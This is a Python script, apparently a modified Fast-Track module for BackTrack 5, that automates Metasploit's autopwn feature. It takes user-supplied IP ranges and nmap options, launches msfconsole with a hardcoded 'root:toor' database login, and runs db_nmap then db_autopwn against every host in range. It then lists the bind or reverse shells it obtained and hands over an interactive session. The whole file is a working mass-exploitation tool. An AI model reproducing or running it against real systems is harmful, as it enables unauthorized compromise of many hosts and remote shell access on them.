#!/usr/bin/env python # This ins not the official file from FastTrack I just made some changes to work with BT5: MaxFX aka Bl4ck5w4n import pexpect import sys import os import time import re definepath=os.getcwd() sys.path.append("%s/bin/ftsrc/" % (definepath)) import include try: import psyco psyco.full() except ImportError: pass try: ipaddr=sys.argv[3] except IndexError: include.print_banner() ipaddr=raw_input(""" Metasploit Autopwn Automation: http://www.metasploit.com This tool specifically piggy backs some commands from the Metasploit Framework and does not modify the Metasploit Framework in any way. This is simply to automate some tasks from the autopwn feature already developed by the Metasploit crew. Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or or whatever you want and it'll run against those hosts. Additionally you can place NMAP commands within the autopwn ip ranges bar, for example, if you want to scan even if a host "appears down" just do -PN or whatever...you can use all NMap syntaxes in the Autopwn IP Ranges portion. When it has completed exploiting simply type this: sessions -l (lists the shells spawned) sessions -i (jumps you into the sessions) Example 1: -PN Example 2: Example 3: -P0 -v -A Example 4: Enter the IP ranges to autopwn or (q)uit FastTrack: """) if ipaddr == 'quit' or ipaddr == 'q': print "\n\nExiting Fast-Track autopwn...\n\n" sys.exit() # Spawn instance of msfconsole try: option1=sys.argv[4] except IndexError: option1=raw_input(""" Do you want to do a bind or reverse payload? Bind = direct connection to the server Reverse = connection originates from server 1. Bind 2. Reverse Enter number: """) if option1 == 'quit' or option1 == 'q': print "\n\n Exiting Fast-Track autopwn...\n\n" sys.exit() if option1 == '1': option1='-b' if option1 == '2': option1='-r' print " Launching MSFConsole and prepping autopwn..." # define metasploit path #meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines() #for line in meta_path: # line=line.rstrip() # match=re.search("METASPLOIT_PATH",line) # if match: # line=line.replace("METASPLOIT_PATH=","") # metapath=line try: os.system("start mysql") child1 = pexpect.spawn('msfconsole') # load sqlite3 child1.sendline ('db_driver mysql') # Destroy database # child1.sendline ('db_destroy pentest') # Create database child1.sendline ('db_connect root:toor@') # run actual port scans child1.sendline ('''db_nmap %s ''' % (ipaddr)) # run actual exploitation child1.sendline ('db_autopwn -p -t -e %s' % (option1)) child1.sendline ('sleep 5') child1.sendline ('jobs -K') child1.sendline ('\n\n\n') child1.sendline ('sessions -l') child1.sendline ('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell"') # jump to pid child1.interact() except Exception: print "\n Exiting Fast-Track...\n"